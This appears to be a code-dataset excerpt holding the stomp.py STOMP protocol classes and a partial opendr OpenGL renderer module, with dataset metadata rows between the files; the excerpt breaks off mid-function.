self.assertEqual(403, response.status_code) | 33.380597 | 96 | 0.633132 | 544 | 4,473 | 4.988971 | 0.141544 | 0.066323 | 0.06706 | 0.056374 | 0.8014 | 0.8014 | 0.8014 | 0.795505 | 0.778556 | 0.77045 | 0 | 0.026642 | 0.261569 | 4,473 | 134 | 97 | 33.380597 | 0.795035 | 0.049408 | 0 | 0.704082 | 0 | 0 | 0.157325 | 0 | 0 | 0 | 0 | 0 | 0.091837 | 1 | 0.102041 | false | 0.010204 | 0.071429 | 0 | 0.204082 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
4da8679e92c4863fc33aa817711581ed05de44d5 | 8,647 | py | Python | stomp/protocol.py | artilect/stomp.py | 554c71695f961a4caf927532e5387a6814385033 | [
"Apache-2.0"
] | null | null | null | stomp/protocol.py | artilect/stomp.py | 554c71695f961a4caf927532e5387a6814385033 | [
"Apache-2.0"
] | null | null | null | stomp/protocol.py | artilect/stomp.py | 554c71695f961a4caf927532e5387a6814385033 | [
"Apache-2.0"
] | null | null | null | import uuid
import utils
from listener import *
from backward import pack, encode, hasbyte
from constants import *
class Protocol10(ConnectionListener):
def __init__(self, transport):
self.transport = transport
transport.set_listener('protocol-listener', self)
self.version = 1.0
def __send_frame(self, cmd, headers = {}, body = ''):
frame = utils.Frame(cmd, headers, body)
self.transport.send_frame(frame)
def abort(self, transaction, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ABORT, headers)
def ack(self, id, transaction = None):
assert id is not None, "'id' is required"
headers = { HDR_ID : id }
if transaction:
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ACK, headers)
def begin(self, transaction = None, headers = {}, **keyword_headers):
headers = utils.merge_headers([headers, keyword_headers])
if not transaction:
transaction = str(uuid.uuid4())
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_BEGIN, headers)
return transaction
def commit(self, transaction = None, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
self.__send_frame('COMMIT', headers)
def connect(self, username=None, passcode=None, wait=False):
cmd = CMD_CONNECT
headers = {
HDR_ACCEPT_VERSION : self.version
}
if username is not None:
headers[HDR_LOGIN] = username
if passcode is not None:
headers[HDR_PASSCODE] = passcode
self.__send_frame(cmd, headers)
if wait:
self.transport.wait_for_connection()
def disconnect(self, receipt = str(uuid.uuid4()), headers = {}, **keyword_headers):
headers = utils.merge_headers([headers, keyword_headers])
if receipt:
headers[HDR_RECEIPT] = receipt
self.__send_frame(CMD_DISCONNECT, headers)
def send(self, destination, body, content_type = None, headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
assert body is not None, "'body' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
if content_type:
headers[HDR_CONTENT_TYPE] = content_type
body = encode(body)
#if HDR_CONTENT_LENGTH not in headers:
# headers[HDR_CONTENT_LENGTH] = len(body)
self.__send_frame(CMD_SEND, headers, body)
def subscribe(self, destination, id=None, ack = 'auto', headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
if id:
headers[HDR_ID] = id
headers[HDR_ACK] = ack
self.__send_frame(CMD_SUBSCRIBE, headers)
def unsubscribe(self, destination = None, id = None, headers = {}, **keyword_headers):
assert id is not None or destination is not None, "'id' or 'destination' is required"
headers = utils.merge_headers([headers, keyword_headers])
if id:
headers[HDR_ID] = id
if destination:
headers[HDR_DESTINATION] = destination
self.__send_frame(CMD_UNSUBSCRIBE, headers)
class Protocol11(HeartbeatListener, ConnectionListener):
def __init__(self, transport, heartbeats = (0, 0)):
HeartbeatListener.__init__(self, heartbeats)
self.transport = transport
transport.set_listener('protocol-listener', self)
self.version = 1.1
def __send_frame(self, cmd, headers = {}, body = ''):
frame = utils.Frame(cmd, headers, body)
self.transport.send_frame(frame)
def abort(self, transaction, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ABORT, headers)
def ack(self, id, transaction = None):
assert id is not None, "'id' is required"
headers = { HDR_ID : id }
if transaction:
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_ACK, headers)
def begin(self, transaction = None, headers = {}, **keyword_headers):
headers = utils.merge_headers([headers, keyword_headers])
if not transaction:
transaction = str(uuid.uuid4())
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_BEGIN, headers)
return transaction
def commit(self, transaction = None, headers = {}, **keyword_headers):
assert transaction is not None, "'transaction' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_TRANSACTION] = transaction
self.__send_frame('COMMIT', headers)
def connect(self, username=None, passcode=None, wait=False):
cmd = CMD_STOMP
headers = {
HDR_ACCEPT_VERSION : self.version
}
if self.transport.vhost:
headers[HDR_HOST] = self.transport.vhost
if username is not None:
headers[HDR_LOGIN] = username
if passcode is not None:
headers[HDR_PASSCODE] = passcode
self.__send_frame(cmd, headers)
if wait:
self.transport.wait_for_connection()
def disconnect(self, receipt = str(uuid.uuid4()), headers = {}, **keyword_headers):
headers = utils.merge_headers([headers, keyword_headers])
if receipt:
headers[HDR_RECEIPT] = receipt
self.__send_frame(CMD_DISCONNECT, headers)
def nack(self, id, transaction = None):
assert id is not None, "'id' is required"
headers = { HDR_ID : id }
if transaction:
headers[HDR_TRANSACTION] = transaction
self.__send_frame(CMD_NACK, headers)
def send(self, destination, body, content_type = None, headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
assert body is not None, "'body' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
if content_type:
headers[HDR_CONTENT_TYPE] = content_type
body = encode(body)
if HDR_CONTENT_LENGTH not in headers and hasbyte(0, body):
headers[HDR_CONTENT_LENGTH] = len(body)
self.__send_frame(CMD_SEND, headers, body)
def subscribe(self, destination, id, ack = 'auto', headers = {}, **keyword_headers):
assert destination is not None, "'destination' is required"
assert id is not None, "'id' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_DESTINATION] = destination
headers[HDR_ID] = id
headers[HDR_ACK] = ack
self.__send_frame(CMD_SUBSCRIBE, headers)
def unsubscribe(self, id, headers = {}, **keyword_headers):
assert id is not None, "'id' is required"
headers = utils.merge_headers([headers, keyword_headers])
headers[HDR_ID] = id
self.__send_frame(CMD_UNSUBSCRIBE, headers)
class Protocol12(Protocol11):
def __init__(self, transport, heartbeats = (0, 0)):
Protocol11.__init__(self, transport, heartbeats)
self.version = 1.2
def __send_frame(self, cmd, headers = {}, body = ''):
frame = utils.Frame(cmd, headers, body)
self.transport.send_frame(frame)
def connect(self, username=None, passcode=None, wait=False):
cmd = CMD_STOMP
headers = {
HDR_ACCEPT_VERSION : self.version,
HDR_HOST : self.transport.current_host_and_port[0]
}
if self.transport.vhost:
headers[HDR_HOST] = self.transport.vhost
if username is not None:
headers[HDR_LOGIN] = username
if passcode is not None:
headers[HDR_PASSCODE] = passcode
self.__send_frame(cmd, headers)
if wait:
self.transport.wait_for_connection()
| 37.925439 | 93 | 0.639759 | 977 | 8,647 | 5.436029 | 0.079836 | 0.075315 | 0.110714 | 0.054227 | 0.923367 | 0.911693 | 0.908304 | 0.875165 | 0.863679 | 0.863679 | 0 | 0.004075 | 0.262056 | 8,647 | 227 | 94 | 38.092511 | 0.82824 | 0.009252 | 0 | 0.834254 | 0 | 0 | 0.047052 | 0 | 0 | 0 | 0 | 0 | 0.088398 | 1 | 0.143646 | false | 0.049724 | 0.027624 | 0 | 0.198895 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
12ac5479a12b1754a06bee2fe3f5617f6cd56c47 | 569,932 | py | Python | opendr/renderer.py | yukihiko/hrm | 89bfb075d3c9ba91826c0c782ca6aff9507c663b | [
"MIT"
] | null | null | null | opendr/renderer.py | yukihiko/hrm | 89bfb075d3c9ba91826c0c782ca6aff9507c663b | [
"MIT"
] | null | null | null | opendr/renderer.py | yukihiko/hrm | 89bfb075d3c9ba91826c0c782ca6aff9507c663b | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# encoding: utf-8
"""
Author(s): Matthew Loper
See LICENCE.txt for licensing and contact information.
"""
__all__ = ['ColoredRenderer', 'TexturedRenderer']
import numpy as np
import pdb
import cv2
import time
import platform
import scipy.sparse as sp
from copy import deepcopy
from opendr import common
from opendr.topology import get_vertices_per_edge, get_faces_per_edge
# if platform.system()=='Darwin':
# from opendr.contexts.ctx_mac import OsContext
# else:
# from opendr.contexts.ctx_mesa import OsContext
import OpenGL.GL as GL
import OpenGL.GL.shaders as shaders
from OpenGL.arrays import vbo
from PIL import Image
# import pdb
import matplotlib.pyplot as plt
from chumpy import *
# from opendr.contexts._constants import *
from chumpy.utils import row, col
import time
pixel_center_offset = 0.5
class BaseRenderer(Ch):
terms = ['f', 'frustum','overdraw', 'win', 'f_list', 'v_list', 'vn_list', 'vc_list']
dterms = ['camera', 'v']
def makeCurrentContext(self):
if self.glMode == 'glfw':
import glfw
glfw.make_context_current(self.win)
else:
from OpenGL import arrays
from OpenGL.raw.osmesa import mesa
mesa.OSMesaMakeCurrent(self.ctx, GL.GLuint(self.mesap), GL.GL_UNSIGNED_BYTE, self.frustum['width'], self.frustum['height'])
def clear(self):
try:
self.win
except:
# print ("Clearing when not initialized.")
return
if self.win:
try:
# print ("Clearing base renderer.")
GL.glDeleteProgram(self.colorProgram)
self.makeCurrentContext()
self.vbo_indices.set_array(np.array([]))
self.vbo_indices.bind()
self.vbo_indices.unbind()
self.vbo_indices.delete()
self.vbo_indices_range.set_array(np.array([]))
self.vbo_indices_range.bind()
self.vbo_indices_range.unbind()
self.vbo_indices_range.delete()
self.vbo_indices_dyn.set_array(np.array([]))
self.vbo_indices_dyn.bind()
self.vbo_indices_dyn.unbind()
self.vbo_indices_dyn.delete()
self.vbo_verts.set_array(np.array([]))
self.vbo_verts.bind()
self.vbo_verts.unbind()
self.vbo_verts.delete()
self.vbo_verts_face.set_array(np.array([]))
self.vbo_verts_face.bind()
self.vbo_verts_face.unbind()
self.vbo_verts_face.delete()
self.vbo_verts_dyn.set_array(np.array([]))
self.vbo_verts_dyn.bind()
self.vbo_verts_dyn.unbind()
self.vbo_verts_dyn.delete()
self.vbo_colors_ub.set_array(np.array([]))
self.vbo_colors_ub.bind()
self.vbo_colors_ub.unbind()
self.vbo_colors_ub.delete()
self.vbo_colors.set_array(np.array([]))
self.vbo_colors.bind()
self.vbo_colors.unbind()
self.vbo_colors.delete()
self.vbo_colors_face.set_array(np.array([]))
self.vbo_colors_face.bind()
self.vbo_colors_face.unbind()
self.vbo_colors_face.delete()
GL.glDeleteVertexArrays(1, [self.vao_static.value])
GL.glDeleteVertexArrays(1, [self.vao_static_face.value])
GL.glDeleteVertexArrays(1, [self.vao_dyn.value])
GL.glDeleteVertexArrays(1, [self.vao_dyn_ub.value])
GL.glDeleteRenderbuffers(1, [int(self.render_buf)])
GL.glDeleteRenderbuffers(1, [int(self.z_buf)])
if self.msaa:
GL.glDeleteRenderbuffers(1, [int(self.render_buf_ms)])
GL.glDeleteRenderbuffers(1, [int(self.z_buf_ms)])
GL.glDeleteFramebuffers(1, [int(self.fbo)])
GL.glDeleteFramebuffers(1, [int(self.fbo_noms)])
if self.msaa:
GL.glDeleteFramebuffers(1, [int(self.fbo_ms)])
# print("Finished clearning base renderer")
except:
pdb.set_trace()
def initGL(self):
try:
self.frustum
self.f
self.v
self.vc
self.glMode
except:
print ("Necessary variables have not been set (frustum, f, v, or vc).")
return
if self.glMode == 'glfw':
import glfw
glfw.init()
print("Initializing GLFW.")
glfw.window_hint(glfw.CONTEXT_VERSION_MAJOR, 3)
glfw.window_hint(glfw.CONTEXT_VERSION_MINOR, 3)
# glfw.window_hint(glfw.OPENGL_FORWARD_COMPAT, GL.GL_TRUE)
glfw.window_hint(glfw.OPENGL_PROFILE, glfw.OPENGL_CORE_PROFILE)
glfw.window_hint(glfw.DEPTH_BITS,32)
glfw.window_hint(glfw.VISIBLE, GL.GL_FALSE)
self.win = glfw.create_window(self.frustum['width'], self.frustum['height'], "test", None, self.sharedWin)
glfw.make_context_current(self.win)
else: #Mesa
from OpenGL import arrays
from OpenGL.raw.osmesa import mesa
try:
self.sharedWin
except:
self.sharedWin = None
self.ctx = mesa.OSMesaCreateContext(GL.GL_RGBA, self.sharedWin)
self.win = self.ctx
self.buf = arrays.GLubyteArray.zeros((self.frustum['height'], self.frustum['width'], 3))
self.mesap = arrays.ArrayDatatype.dataPointer(self.buf)
assert(mesa.OSMesaMakeCurrent(self.ctx, GL.GLuint(self.mesap), GL.GL_UNSIGNED_BYTE, self.frustum['width'], self.frustum['height']))
GL.USE_ACCELERATE = True
GL.glViewport(0, 0, self.frustum['width'], self.frustum['height'])
#FBO_f
self.fbo = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
self.render_buf = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER,self.render_buf)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_DRAW_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buf)
self.z_buf = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf)
GL.glRenderbufferStorage(GL.GL_RENDERBUFFER, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf)
self.line_width = 1.
#FBO_f
# if self.msaa and self.glMode == 'glfw':
if self.msaa:
try:
self.nsamples
except:
self.nsamples = 8
try:
self.overdraw
except:
self.overdraw = True
self.fbo_ms = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_ms )
self.render_buf_ms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER,self.render_buf_ms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_DRAW_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buf_ms)
self.z_buf_ms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_ms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER, self.nsamples, GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_ms)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print ("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER,0)
self.fbo_noms = GL.glGenFramebuffers(1)
GL.glDepthMask(GL.GL_TRUE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo_noms )
self.render_buf_noms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER,self.render_buf_noms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER,0, GL.GL_RGB8, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_DRAW_FRAMEBUFFER, GL.GL_COLOR_ATTACHMENT0, GL.GL_RENDERBUFFER, self.render_buf_noms)
self.z_buf_noms = GL.glGenRenderbuffers(1)
GL.glBindRenderbuffer(GL.GL_RENDERBUFFER, self.z_buf_noms)
GL.glRenderbufferStorageMultisample(GL.GL_RENDERBUFFER,0 , GL.GL_DEPTH_COMPONENT, self.frustum['width'], self.frustum['height'])
GL.glFramebufferRenderbuffer(GL.GL_FRAMEBUFFER, GL.GL_DEPTH_ATTACHMENT, GL.GL_RENDERBUFFER, self.z_buf_noms)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDisable(GL.GL_CULL_FACE)
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
print ("FRAMEBUFFER ERR: " + str(GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER)))
assert (GL.glCheckFramebufferStatus(GL.GL_FRAMEBUFFER) == GL.GL_FRAMEBUFFER_COMPLETE)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER,0)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT)
# GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
############################
# ENABLE SHADER
FRAGMENT_SHADER = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
in vec3 theColor;
// Ouput data
out vec3 color;
void main(){
color = theColor;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
uniform mat4 MVP;
out vec3 theColor;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
}""", GL.GL_VERTEX_SHADER)
self.colorProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
shaders.glUseProgram(self.colorProgram)
FRAGMENT_SHADER_NOPERSP = shaders.compileShader("""#version 330 core
// Interpolated values from the vertex shaders
in vec3 theColor;
//noperspective in vec3 theColor;
// Ouput data
out vec3 color;
void main(){
color = color.xyz;
}""", GL.GL_FRAGMENT_SHADER)
VERTEX_SHADER_NOPERSP = shaders.compileShader("""#version 330 core
// Input vertex data, different for all executions of this shader.
layout (location = 0) in vec3 position;
layout (location = 1) in vec3 color;
uniform mat4 MVP;
out vec3 theColor;
//noperspective out vec3 theColor;
// Values that stay constant for the whole mesh.
void main(){
// Output position of the vertex, in clip space : MVP * position
gl_Position = MVP* vec4(position,1);
theColor = color;
}""", GL.GL_VERTEX_SHADER)
self.colorProgram_noperspective = shaders.compileProgram(VERTEX_SHADER_NOPERSP,FRAGMENT_SHADER_NOPERSP)
# self.colorProgram = shaders.compileProgram(VERTEX_SHADER,FRAGMENT_SHADER)
position_location = GL.glGetAttribLocation(self.colorProgram, 'position')
color_location = GL.glGetAttribLocation(self.colorProgram, 'color')
# color_location_ub = GL.glGetAttribLocation(self.colorProgram, 'color')
self.MVP_location = GL.glGetUniformLocation(self.colorProgram, 'MVP')
#
GL.glClear(GL.GL_COLOR_BUFFER_BIT)
GL.glClear(GL.GL_DEPTH_BUFFER_BIT)
indices = np.array(self.f, dtype=np.uint32)
self.vbo_indices = vbo.VBO(indices, target=GL.GL_ELEMENT_ARRAY_BUFFER)
self.vbo_indices_range = vbo.VBO(np.arange(self.f.size, dtype=np.uint32).ravel(), target=GL.GL_ELEMENT_ARRAY_BUFFER)
self.vbo_indices_dyn = vbo.VBO(indices, target=GL.GL_ELEMENT_ARRAY_BUFFER)
self.vbo_verts = vbo.VBO(np.array(self.v, dtype=np.float32))
# glGenBuffers(1, &vboID);
# glBindBuffer(GL_VERTEX_ARRAY, vboID);
# glBufferData(GL_VERTEX_ARRAY, 3 * sizeof(Vertex), &vertices[0], GL_STATIC_DRAW);
# glBindBuffer(GL_VERTEX_ARRAY, NULL);
self.vbo_verts_face = vbo.VBO(self.verts_by_face.astype(np.float32))
self.vbo_verts_dyn = vbo.VBO(np.array(self.v, dtype=np.float32))
self.vbo_colors = vbo.VBO(np.array(self.vc, dtype=np.float32))
self.vbo_colors_face = vbo.VBO(np.array(self.vc_by_face, dtype=np.float32))
self.vao_static = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_static)
GL.glBindVertexArray(self.vao_static)
self.vbo_indices.bind()
self.vbo_verts.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_static_face = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_static_face)
GL.glBindVertexArray(self.vao_static_face)
#Can arrays be empty?
self.vbo_indices_range.bind()
self.vbo_verts_face.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors_face.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_dyn = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_dyn)
GL.glBindVertexArray(self.vao_dyn)
#Can arrays be empty?
self.vbo_indices_dyn.bind()
self.vbo_verts_dyn.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
GL.glBindVertexArray(0)
self.vao_dyn_ub = GL.GLuint(0)
GL.glGenVertexArrays(1, self.vao_dyn_ub)
GL.glBindVertexArray(self.vao_dyn_ub)
self.vbo_indices_dyn.bind()
self.vbo_verts_dyn.bind()
GL.glEnableVertexAttribArray(position_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(position_location, 3, GL.GL_FLOAT, GL.GL_FALSE, 0, None)
self.vbo_colors_ub = vbo.VBO(np.array(np.array(self.vc, dtype=np.uint8)))
self.vbo_colors_ub.bind()
GL.glEnableVertexAttribArray(color_location) # from 'location = 0' in shader
GL.glVertexAttribPointer(color_location, 3, GL.GL_UNSIGNED_BYTE, GL.GL_TRUE, 0, None)
self.initialized = True
print('glValidateProgram: ' + str(GL.glValidateProgram(self.colorProgram)))
print('glGetProgramInfoLog ' + str(GL.glGetProgramInfoLog(self.colorProgram)))
print('GL_MAX_VERTEX_ATTRIBS: ' + str(GL.glGetInteger(GL.GL_MAX_VERTEX_ATTRIBS)))
print (GL.glGetError())
@depends_on('f') # not v: specifically, it depends only on the number of vertices, not on the values in v
def primitives_per_edge(self):
v=self.v.r.reshape((-1,3))
f=self.f
vpe = get_vertices_per_edge(v, f)
fpe = get_faces_per_edge(v, f, vpe)
return fpe, vpe
@depends_on('f', 'frustum', 'camera', 'overdraw')
def barycentric_image(self):
self._call_on_changed()
return self.draw_barycentric_image(self.boundarybool_image if self.overdraw else None)
@depends_on(terms+dterms)
def boundaryid_image(self):
self._call_on_changed()
return self.draw_boundaryid_image( self.v.r, self.f, self.vpe, self.fpe, self.camera)
@depends_on('f', 'frustum', 'camera', 'overdraw')
def visibility_image(self):
self._call_on_changed()
return self.draw_visibility_image(self.v.r, self.f, self.boundarybool_image if self.overdraw else None)
@depends_on(terms+dterms)
def boundarybool_image(self):
self._call_on_changed()
boundaryid_image = self.boundaryid_image
return np.asarray(boundaryid_image != 4294967295, np.uint32).reshape(boundaryid_image.shape)
@depends_on(terms+dterms)
def boundarybool_image_aa(self):
self._call_on_changed()
boundaryid_image = self.boundaryid_image_aa
return np.asarray(boundaryid_image != 4294967295, np.uint32).reshape(boundaryid_image.shape)
@property
def shape(self):
raise NotImplementedError('Should be implemented in inherited class.')
# @v.setter
# def v(self, newval):
# self.camera.v = newval
@property
def vpe(self):
return self.primitives_per_edge[1]
@depends_on('f', 'v')
def verts_by_face(self):
verts_by_face = self.v.reshape((-1,3))[self.f.ravel()]
return np.asarray(verts_by_face, dtype=np.float64, order='C')
@depends_on('f', 'v')
def vc_by_face(self):
return np.asarray(np.tile(np.eye(3)[:self.f.shape[1], :], (self.verts_by_face.shape[0]//self.f.shape[1], 1)), dtype=np.float64, order='C')
@depends_on('f', 'v', 'vn')
def tn(self):
from opendr.geometry import TriNormals
# return TriNormals(self.v, self.f).r.reshape((-1,3))
tn = np.mean(self.vn.r[self.f.ravel()].reshape([-1, 3, 3]), 1)
return tn
@property
def fpe(self):
return self.primitives_per_edge[0]
@depends_on(terms+dterms)
def boundary_neighborhood(self):
return common.boundary_neighborhood(self.boundarybool_image)
def _setup_camera(self, cx, cy, fx, fy, w, h, near, far, view_matrix, k):
k = np.asarray(k)
#Make Projection matrix.
self.projectionMatrix = np.array([[fx/cx, 0,0,0], [0, fy/cy, 0,0], [0,0, -(near + far)/(far - near), -2*near*far/(far-near)], [0,0, -1, 0]], dtype=np.float32)
# self.projectionMatrix = np.array([[fx/w, 0,0,0], [0, fy/cy, 0,0], [0,0, -(near + far)/(far - near), -2*near*far/(far-near)], [0,0,-1,1]], dtype=np.float64)
def draw_colored_verts(self, vc):
GL.glUseProgram(self.colorProgram)
GL.glDisable(GL.GL_CULL_FACE)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
if vc.shape[1] != 3:
#Pol: ??
vc = np.vstack((vc[:,0], vc[:,1%vc.shape[1]], vc[:,2%vc.shape[1]])).T.copy()
assert(vc.shape[1]==3)
GL.glBindVertexArray(self.vao_static)
self.vbo_colors.set_array(vc.astype(np.float32))
self.vbo_colors.bind()
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))), np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDrawElements(GL.GL_TRIANGLES, len(self.vbo_indices)*3, GL.GL_UNSIGNED_INT, None)
GL.glDisable(GL.GL_CULL_FACE)
def draw_noncolored_verts(self, v, f):
if self.msaa:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms)
else:
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_noms)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
shaders.glUseProgram(self.colorProgram)
GL.glBindVertexArray(self.vao_static)
self.vbo_colors.set_array(np.zeros_like(v.reshape((-1,3))[f.ravel()], dtype=np.float32, order='C'))
self.vbo_color.bind()
GL.glDrawElements(GL.GL_TRIANGLES, len(self.vbo_indices)*3, GL.GL_UNSIGNED_INT, None)
def draw_edge_visibility(self, v, e, f, hidden_wireframe=True):
"""Assumes camera is set up correctly in gl context."""
shaders.glUseProgram(self.colorProgram)
GL.glBindFramebuffer(GL.GL_FRAMEBUFFER, self.fbo)
GL.glDepthMask(GL.GL_TRUE)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
GL.glEnable(GL.GL_POLYGON_OFFSET_FILL)
GL.glPolygonOffset(1, 1)
self.draw_colored_verts(np.zeros_like(self.vc.r))
GL.glDisable(GL.GL_POLYGON_OFFSET_FILL)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT)
ec = np.arange(1, len(e)+1)
ec = np.tile(ec.reshape((-1,1)), (1, 3))
ec[:, 0] = ec[:, 0] & 255
ec[:, 1] = (ec[:, 1] >> 8 ) & 255
ec[:, 2] = (ec[:, 2] >> 16 ) & 255
ec = np.asarray(ec, dtype=np.uint8)
# GL.glDepthFunc(GL.GL_GREATER)
# GL.glEnable(GL.GL_POLYGON_OFFSET_LINE)
# GL.glPolygonOffset(-10000.0, -10000.0)
# GL.glDepthMask(GL.GL_FALSE)
# self.projectionMatrix[2, 2] += 0.0000001
GL.glDepthFunc(GL.GL_LEQUAL)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_LINE)
self.draw_colored_primitives(self.vao_dyn_ub, v, e, ec)
GL.glPolygonMode(GL.GL_FRONT_AND_BACK, GL.GL_FILL)
GL.glDepthFunc(GL.GL_LESS)
# self.projectionMatrix[2, 2] -= 0.0000001
